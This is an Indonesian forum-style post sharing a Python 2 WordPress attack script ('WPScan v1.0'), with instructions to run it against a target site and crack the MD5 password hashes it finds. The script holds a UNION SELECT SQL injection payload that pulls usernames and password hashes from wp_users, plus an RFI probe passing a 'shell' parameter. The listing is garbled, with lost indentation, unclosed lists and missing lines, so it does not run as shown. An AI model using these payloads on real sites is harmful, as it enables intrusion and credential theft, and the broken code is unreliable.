udeh itu aja kok ....peace...................:P
nah sekarang liat code di bawah ini
#WordPress SQL/RFI/CGI scanner. SQL will check
#for md5's in the source and RFI/CGI will use
#http responses.
import sys, urllib2, re, time, httplib
# HTTP status codes that the RFI and CGI passes treat as "path not present".
# Every other status (redirects, 403, 5xx included) is reported as a hit by
# the `resp not in BAD_RESP` checks, so a hit only means the path answered,
# not that the component behind it is vulnerable.
BAD_RESP = [
    400,
    401,
    404,
]
# Send one HEAD request for `path` under the target and report the outcome.
#
# Reads the module-level `host` string ("hostname/base-path/", assigned further
# down in the script): the part before the first "/" is the server contacted,
# the part after it is prefixed to `path`.
# Returns (status code, reason phrase, value of the Server response header).
# The method is HEAD and Host is the only header the visible code sets, so the
# probe asks for status and headers only, never a response body.
# NOTE(review): this is Python 2 code (print statement, httplib) and lines
# appear to be missing from the listing: the `except` below has no `try:` and
# the body has lost its indentation, so the function does not parse as shown.
# The `except` clause also names an empty tuple, which matches no exception.
def main(path):
print "[+] Testing:",host.split("/",1)[1]+path
h = httplib.HTTP(host.split("/",1)[0])
h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
h.putheader("Host", host.split("/",1)[0])
resp, reason, headers = h.getreply()
return resp, reason, headers.get("Server")
except(), msg:
print "Error Occurred:",msg
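def timer():
    """Return the current local time as a ``time.asctime`` string.

    The script prints this value on its "Started" line. The body indentation
    that the listing had lost is restored here so the function parses.
    """
    return time.asctime(time.localtime(time.time()))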
# --- Script body (Python 2: print statements, urllib2, httplib) ---
# Prints a banner, loads three probe tables, normalises the target taken from
# argv, then runs the SQL, RFI and CGI passes in that order.
# NOTE(review): this listing has lost its indentation and some lines: the three
# table literals below are never closed, the usage string is unterminated, and
# the `[-] Got:` lines in the RFI/CGI passes have no visible `else:`. It does
# not parse as shown.
print "\n\t d3hydr8[at]gmail[dot]com WPScan v1.0"
print "\t------------------------------------------"
# Probe tables; only the first entry of each is visible in this listing.
# sqls: query strings appended to the site URL. The visible entry places a
# UNION SELECT over wp_users (user_pass, user_login) in the `cat` parameter,
# so `cat=` values containing UNION/SELECT/wp_users in web access logs are the
# trace this pass leaves behind.
sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
# rfis: path requested with HEAD -> path printed as a follow-up if it answers.
rfis = {"plugins/Enigma2.php":"index/wp-content/plugins/Enigma2.php?boarddir=shell",
# cgis: path requested with HEAD -> reference URL printed if it answers.
cgis = {"wp-trackback.php":"http://milw0rm.com/exploits/3095",
# Exactly one command-line argument (the site) is expected.
if len(sys.argv) != 2:
print "\nUsage: ./wpscan.py
print "Ex: ./wpscan.py www.site.com/wp-content/\n"
# Normalise the target: remove "http://" (an https:// prefix is not handled),
# cut everything after the last "/", then make sure the result ends in "/".
host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
if host[-1] != "/":
host = host+"/"
print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)
print "[+] RFI Loaded:",len(rfis)
print "[+] CGI Loaded:",len(cgis)
# One HEAD request to the base path, used only to read the Server header.
server = main("/")[2]
print "[+] Server:",server
print "\n[+] Started:",timer()
print "\n[+] Scanning: SQL\n"
# SQL pass: one GET per table entry, with a fixed 2-second pause before each
# request (a regular request spacing that shows up in access logs).
for sql in sqls:
time.sleep(2) #Change this if needed
print "[+] Trying:",sql.replace("\n","")
source = urllib2.urlopen("http://"+host+sql.replace("\n","")).read()
# Any run of 32 lowercase hex characters anywhere in the response body is
# counted as an MD5. Presumably this also matches unrelated hex strings in a
# page, so a match is not proof that password hashes were returned.
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
print "[!]",host+sql.replace("\n","")
for md5 in md5s:
print "\n\t[+]MD5:",md5
print "\n[+] Scanning: RFI\n"
# RFI pass: status-only check through main(). Every status outside BAD_RESP is
# reported, so a hit means the path answered, not that the plugin is exploitable.
for rfi, shell in rfis.items():
resp,reason,server = main(rfi)
if resp not in BAD_RESP:
print "\t[+] Got:",resp, reason
print "\t[+] Try:",host+shell
print "\t[-] Got:",resp, reason
print "\n[+] Scanning: CGI\n"
# CGI pass: same status-only check; on a hit it prints the reference URL
# stored in the table and does nothing further with the path.
for cgi, expl in cgis.items():
resp,reason,server = main(cgi)
if resp not in BAD_RESP:
print "\t[+] Got:",resp, reason
print "\t[+] Check:",expl
print "\t[-] Got:",resp, reason
print "\n[-] Done\n"
copas aja dah ,,,trus save dengan nama wpscan.py... klo udah ...ikutin langkah-langkah berikut
- buka command prompt (start - run - cmd)
- tuliskan perintah cd desktop
- tuliskan perintah wpscan.py (untuk introduction)
- tuliskan perintah wpscan.py url-target.wordpress.com
nanti lo bakalan ketemu dengan hasil password (yang tampil adalah hash MD5, bukan password asli) ,,,tinggal di enkripsi md5
